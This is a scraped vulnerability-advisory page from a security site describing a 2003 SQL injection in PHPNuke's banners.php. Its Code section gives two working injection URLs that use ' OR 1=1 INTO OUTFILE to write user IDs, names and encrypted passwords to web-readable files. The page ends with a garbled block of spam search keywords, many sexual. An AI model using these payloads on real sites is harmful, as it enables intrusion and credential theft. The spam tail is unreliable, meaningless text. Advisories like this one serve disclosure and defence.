exploits , vulnerabilities , articles , PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability

Title	PHPNuke Banners.PHP Banner Manager Password Disclosure Vulnerability
Published	2003-03-22-12:00AM
Updated	2003-03-22-09:10PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery credited to "Frog Man" <leseulfrog@hotmail.com>.
Vulnerable	Francisco Burzi PHPNuke 6.5 RC3 Francisco Burzi PHPNuke 6.5 RC2 Francisco Burzi PHPNuke 6.5 RC1 Francisco Burzi PHPNuke 6.5 Francisco Burzi PHPNuke 6.0 Francisco Burzi PHPNuke 5.6
Not Vulnerable
Code	The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>: This will save id, name and crypted password into http://www.example.com/banners1.txt : http://www.example.com/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt This will save crypted password into http://[target]/banners2.txt : http://www.example.com/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-19 Serv-U File Server User Directory Information Disclosure Vulnerability
2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 04:20:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pic sex gi sexcitypk odules/vwa cafe wwwtamihot Qxj Tamil nude 200 /compo administra Jenyfer lo gey Sun One Me www.xueben sexanal l6i maxcpm.inf p...com/ch connect at phpBB por Trisha sex HTML Injec CMS is Fre Hatt www.tokyo- Sexy girl %2Fmodules vedieo www.tumuba Sex18 mambo Remo news for c News Searc sex woomen AdRoundup. Www.tube8. www.lexsen news for c www.doorr8 www.lexsen frankyrp@h www.youxij www.Xlxx.C maxcpm.inf Invision P hot vedios components PHP-Nuke Www.Animal Sexuelly WWW.Sexy w